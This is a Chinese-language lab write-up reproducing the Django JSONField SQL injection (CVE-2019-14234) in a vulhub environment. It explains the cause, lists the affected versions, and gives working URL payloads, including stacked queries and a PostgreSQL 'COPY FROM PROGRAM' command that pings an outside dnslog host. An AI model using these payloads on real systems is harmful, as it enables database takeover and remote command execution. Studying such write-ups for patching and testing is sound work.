Django JSONField/HStoreField SQL 注入漏洞 (CVE-2019-14234)

本文主要是介绍Django JSONField/HStoreField SQL 注入漏洞 (CVE-2019-14234)，对大家解决编程问题具有一定的参考价值，需要的程序猿们随着小编来一起学习吧！

一.漏洞描述
该漏洞需要开发者使用了JSONField/HStoreField，且用户可控queryset查询时的键名，在键名的位置注入SQL语句。

Django通常搭配postgresql数据库，而JSONField是该数据库的一种数据类型。该漏洞的出现的原因在于Django中JSONField类的实现，Django的model最本质的作用是生成SQL语句，而在Django通过JSONField生成sql语句时，是通过简单的字符串拼接。
二.漏洞复线
1.用靶场vulhub进行复现
在Django注入时，受影响的版本有：
1.11.x before 1.11.23

2.1.x before 2.1.11

2.2.x before 2.2.4
2.Django介绍
Django是一款Python的网络开发框架，具有良好的开发特性，web开发中也经常会用到，通常情况下，我们常见的web开发框架有Java，Python，PHP，Javascript等语言进行编写的，现在很多web网站都是利用java语言开发的，java语言开发的框架有Spring,Spring,MYBatis,struts2 架构等。当然在这些web架构中，也必定存在一些bug。
3.漏洞复现
1）浏览

2）实施注入
根据靶场内的提示，账号密码：admin/a123123123
在登陆之后，是一个后台管理的页面，根据这个提示，可以知道如果在你的Django中使用了JSONField并且查询的“键名”可控，就可以进行SQL注入。

访问http://ip:8000/admin。

在得到这个页面的时候，通常都是可以添加数据的，可是这个不可以。
3）漏洞产生原因
是什么原因导致这样的漏洞的？
这样，我们可以来看看JSON fILED的实现：

JSONField继承自Field，其实Django中所有字段都继承自Field，其中定义了get_transform函数。
4)构造Payload进行sql注入

url:http://172.20.10.9:8000/admin/vuln/collection/?detail__xxx'yyyy

可以看到，在添加了之后，出现了报错信息，这说明了注入成功，构造的SQL语句是可以执行的；
为了进一步的验证，

payload:http://172.20.10.9:8000/admin/vuln/collection/?detail__title')=%271%27%20or%201=1--

其生成的SQL语句我们是可以看到的，也是被执行了的。
接着，我们继续验证，试着新的命令注入。

Payload:?detail__title')%3d'1' or 1%3d1 %3bcreate table cmd_exec(cmd_output text)--%20

在此次的结果中，依然显示了没有结果，

最后，我们用DNSLOG进行检查一下，
payload:?detail__title')%3d'1' or 1%3d1 %3bcopy cmd_exec FROM PROGRAM 'ping 37rsq9.dnslog.cn'--%20

可以看到已检查到了流量的变化。
在网上，也有很多在说，在docker没有对端口的映射，无法对其获得权限；有想法的可以去下载一个端口映射的程序，进行进一步的测试。

参考：https://www.leavesongs.com/PENETRATION/django-jsonfield-cve-2019-14234.html

这篇关于Django JSONField/HStoreField SQL 注入漏洞 (CVE-2019-14234)的文章就介绍到这儿，希望我们推荐的文章对大家有所帮助，也希望大家多多支持为之网！